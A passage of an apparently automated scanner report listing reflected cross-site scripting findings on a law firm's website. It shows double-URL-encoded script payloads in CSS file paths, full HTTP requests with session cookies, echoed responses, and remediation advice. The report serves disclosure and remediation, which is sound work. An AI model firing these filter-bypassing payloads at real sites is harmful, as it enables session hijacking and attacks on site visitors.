GET /css/ui/ui.datepicker.css45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.datepicker.css45672"><script>alert(1)</script>4f4fe8f9220" value="">
...[SNIP]...

2.80. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f was submitted in the REST URL parameter 1. This input was echoed as 36a08"><script>alert(1)</script>cbd401dfa0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f/ui/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css36a08"><script>alert(1)</script>cbd401dfa0f/ui/ui.dialog.css" value="">
...[SNIP]...

2.81. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49 was submitted in the REST URL parameter 2. This input was echoed as 8c042"><script>alert(1)</script>e88d9eeae49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui8c042"><script>alert(1)</script>e88d9eeae49/ui.dialog.css" value="">
...[SNIP]...

2.82. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 was submitted in the REST URL parameter 3. This input was echoed as bf81b"><script>alert(1)</script>ed17f52d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.dialog.cssbf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.dialog.cssbf81b"><script>alert(1)</script>ed17f52d89" value="">
...[SNIP]...

2.83. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0 was submitted in the REST URL parameter 1. This input was echoed as 5cb17"><script>alert(1)</script>e53ecb908c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0/ui/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css5cb17"><script>alert(1)</script>e53ecb908c0/ui/ui.progressbar.css" value="">
...[SNIP]...

2.84. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426 was submitted in the REST URL parameter 2. This input was echoed as 612ba"><script>alert(1)</script>8b00486b426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui612ba"><script>alert(1)</script>8b00486b426/ui.progressbar.css" value="">
...[SNIP]...

2.85. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e was submitted in the REST URL parameter 3. This input was echoed as 13c9c"><script>alert(1)</script>4a99b88c02e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.progressbar.css13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.progressbar.css13c9c"><script>alert(1)</script>4a99b88c02e" value="">
...[SNIP]...

2.86. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be was submitted in the REST URL parameter 1. This input was echoed as 14fad"><script>alert(1)</script>9c0b0ee56be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be/ui/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css14fad"><script>alert(1)</script>9c0b0ee56be/ui/ui.resizable.css" value="">
...[SNIP]...

2.87. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda was submitted in the REST URL parameter 2. This input was echoed as 3fcda"><script>alert(1)</script>8c138520eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3fcda"><script>alert(1)</script>8c138520eda/ui.resizable.css" value="">
...[SNIP]...

2.88. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.resizable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 was submitted in the REST URL parameter 3. This input was echoed as f779c"><script>alert(1)</script>382088a8c20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.resizable.cssf779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.resizable.cssf779c"><script>alert(1)</script>382088a8c20" value="">
...[SNIP]...

2.89. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10 was submitted in the REST URL parameter 1. This input was echoed as c2d5f"><script>alert(1)</script>87253ed8d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssc2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10/ui/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssc2d5f"><script>alert(1)</script>87253ed8d10/ui/ui.slider.css" value="">
...[SNIP]...

2.90. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625 was submitted in the REST URL parameter 2. This input was echoed as 7d474"><script>alert(1)</script>1e1c925c625 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui7d474"><script>alert(1)</script>1e1c925c625/ui.slider.css" value="">
...[SNIP]...

2.91. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.slider.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 was submitted in the REST URL parameter 3. This input was echoed as eb3ab"><script>alert(1)</script>de52d4ea844 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.slider.csseb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.slider.csseb3ab"><script>alert(1)</script>de52d4ea844" value="">
...[SNIP]...

2.92. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48 was submitted in the REST URL parameter 1. This input was echoed as e5847"><script>alert(1)</script>63b9f9dcf48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csse5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48/ui/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csse5847"><script>alert(1)</script>63b9f9dcf48/ui/ui.tabs.css" value="">
...[SNIP]...

2.93. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89 was submitted in the REST URL parameter 2. This input was echoed as 81a0d"><script>alert(1)</script>ee949bf1e89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
